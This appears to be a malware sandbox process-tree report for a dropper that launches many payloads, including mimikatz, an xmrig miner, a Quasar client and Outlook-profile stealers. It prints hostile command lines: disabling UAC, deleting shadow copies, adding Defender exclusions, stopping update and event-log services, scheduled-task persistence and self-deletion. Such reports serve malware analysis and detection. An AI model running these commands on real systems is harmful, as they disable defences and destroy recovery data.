C:\Users\Admin\Desktop\a\BootstrapperNew.exe"C:\Users\Admin\Desktop\a\BootstrapperNew.exe"6⤵PID:3192
-
-
C:\Users\Admin\Desktop\a\prueba.exe"C:\Users\Admin\Desktop\a\prueba.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Users\Admin\Desktop\a\evetbeta.exe"C:\Users\Admin\Desktop\a\evetbeta.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2648
-
-
C:\Users\Admin\Desktop\a\benpolatalemdar.exe"C:\Users\Admin\Desktop\a\benpolatalemdar.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"6⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3172 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵PID:3264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4500
-
-
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"7⤵
- Adds Run key to start application
PID:4308 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 6128⤵
- Program crash
PID:484
-
-
-
-
C:\Users\Admin\Desktop\a\testingg.exe"C:\Users\Admin\Desktop\a\testingg.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Users\Admin\Desktop\a\._cache_testingg.exe"C:\Users\Admin\Desktop\a\._cache_testingg.exe"7⤵PID:1400
-
-
-
C:\Users\Admin\Desktop\a\mcgen.exe"C:\Users\Admin\Desktop\a\mcgen.exe"6⤵PID:4496
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6140 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5656 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5672
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
PID:4656
-
-
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"4⤵
- Executes dropped EXE
PID:5152
-
-
C:\Users\Admin\Desktop\a\Client.exe"C:\Users\Admin\Desktop\a\Client.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1904
-
-
C:\Users\Admin\Desktop\a\svhost.exe"C:\Users\Admin\Desktop\a\svhost.exe"4⤵
- Executes dropped EXE
PID:2448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3092
-
-
-
C:\Users\Admin\Desktop\a\mimikatz.exe"C:\Users\Admin\Desktop\a\mimikatz.exe"4⤵
- Executes dropped EXE
PID:2392
-
-
C:\Users\Admin\Desktop\a\123.exe"C:\Users\Admin\Desktop\a\123.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5708 -
C:\Users\Admin\Desktop\a\._cache_123.exe"C:\Users\Admin\Desktop\a\._cache_123.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4252
-
-
-
C:\Users\Admin\Desktop\a\xmrig.exe"C:\Users\Admin\Desktop\a\xmrig.exe"4⤵
- Executes dropped EXE
PID:1864
-
-
C:\Users\Admin\Desktop\a\chrtrome22.exe"C:\Users\Admin\Desktop\a\chrtrome22.exe"4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Executes dropped EXE
PID:3416 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:5032
-
-
C:\xmrig\xmrig-6.22.2\xmrig.exe"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json5⤵
- Executes dropped EXE
PID:1368 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:2808
-
-
-
-
C:\Users\Admin\Desktop\a\Fixer.exe"C:\Users\Admin\Desktop\a\Fixer.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3100 -
C:\Users\Admin\Desktop\a\._cache_Fixer.exe"C:\Users\Admin\Desktop\a\._cache_Fixer.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1096
-
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0L6xtcZiJvQj.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5124
-
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
- System Location Discovery: System Language Discovery
PID:2392
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5708
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2252
-
-
-
-
C:\Users\Admin\Desktop\a\uu.exe"C:\Users\Admin\Desktop\a\uu.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5988
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
PID:228 -
\??\c:\Windows\system32\wbem\wmic.exec:\uDSfNU\uDSf\..\..\Windows\uDSf\uDSf\..\..\system32\uDSf\uDSf\..\..\wbem\uDSf\uDSfN\..\..\wmic.exe shadowcopy delete5⤵PID:3060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6140
-
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\MxHqXn\MxHq\..\..\Windows\MxHq\MxHq\..\..\system32\MxHq\MxHq\..\..\wbem\MxHq\MxHqX\..\..\wmic.exe shadowcopy delete5⤵PID:3812
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:296
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3092 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5156
-
-
-
-
C:\Users\Admin\Desktop\a\sela.exe"C:\Users\Admin\Desktop\a\sela.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:5860
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:784
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵
- Executes dropped EXE
PID:5684
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- outlook_office_path
- outlook_win_path
PID:5776
-
-
-
C:\Users\Admin\Desktop\a\00.exe"C:\Users\Admin\Desktop\a\00.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4704 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:3184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 3845⤵
- Program crash
PID:4828
-
-
-
C:\Users\Admin\Desktop\a\64.exe"C:\Users\Admin\Desktop\a\64.exe"4⤵PID:5508
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0a5⤵PID:5388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 9365⤵PID:388
-
C:\Windows\system32\chcp.comchcp 9366⤵PID:2680
-
-
-
-
C:\Users\Admin\Desktop\a\02.exe"C:\Users\Admin\Desktop\a\02.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3152 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:5372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 3845⤵
- Program crash
PID:3796
-
-
-
C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"4⤵PID:1140
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4452 -
C:\Users\Admin\AppData\Local\Temp\is-7T383.tmp\Kerish_Doctor_2022.tmp"C:\Users\Admin\AppData\Local\Temp\is-7T383.tmp\Kerish_Doctor_2022.tmp" /SL5="$B0280,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1484
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3704
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.exe"4⤵PID:2148
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4068 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffef018cc40,0x7ffef018cc4c,0x7ffef018cc583⤵PID:5932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=1964 /prefetch:23⤵PID:3808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=1860 /prefetch:33⤵PID:5604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2252 /prefetch:83⤵PID:2992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3148 /prefetch:13⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3188 /prefetch:13⤵PID:5332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4652,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4628 /prefetch:13⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3592,i,15653230908538284384,8447439248633040458,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=1376 /prefetch:13⤵PID:5636
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3408 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5300 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
PID:4536
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
PID:3276
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5252 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1192 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4924
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:2236
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:1136
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:2892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4344
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:3728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:4000
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:5348
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
PID:4620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1996
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
PID:5996 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3696
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
PID:5196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5236
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:5216 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5040
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵PID:1992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:2676 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3844
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"5⤵
- Launches sc.exe
PID:4944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4148
-
-
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5072
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
PID:5896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 7965⤵
- Program crash
PID:4088
-
-
-
C:\Users\Admin\Desktop\a\Steanings.exe"C:\Users\Admin\Desktop\a\Steanings.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5548
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\is-9PON2.tmp\Kerish_Doctor.tmp"C:\Users\Admin\AppData\Local\Temp\is-9PON2.tmp\Kerish_Doctor.tmp" /SL5="$803AC,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2056
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4212 -
C:\Users\Admin\AppData\Local\Temp\is-FE420.tmp\Kerish_Doctor_Windows_XP.tmp"C:\Users\Admin\AppData\Local\Temp\is-FE420.tmp\Kerish_Doctor_Windows_XP.tmp" /SL5="$60528,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5328
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2017.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2017.exe"4⤵PID:6048
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4112 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffef018cc40,0x7ffef018cc4c,0x7ffef018cc583⤵PID:3440
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3440 -s 10044⤵PID:1824
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2040 /prefetch:23⤵PID:3160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1924,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2084 /prefetch:33⤵PID:2204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2024,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=2184 /prefetch:83⤵PID:5776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3136 /prefetch:13⤵PID:4328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3168 /prefetch:13⤵PID:1876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4552 /prefetch:13⤵PID:956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=2228,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=4748 /prefetch:13⤵PID:4632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3220,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3248 /prefetch:83⤵PID:4428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3244,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=3692 /prefetch:83⤵PID:5696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5064,i,11854539113510822353,9544393703369355624,262144 --variations-seed-version=20250113-050136.126000 --mojo-platform-channel-handle=5076 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2648 -
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2088 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Executes dropped EXE
PID:4892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:2628
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5344 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5468 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:3104
-
-
C:\Users\Admin\Desktop\a\Client-base.exe"C:\Users\Admin\Desktop\a\Client-base.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4248 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2708 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3304
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4656 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Executes dropped EXE
PID:3776 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4932
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3776 -s 16486⤵PID:3276
-
-
-
-
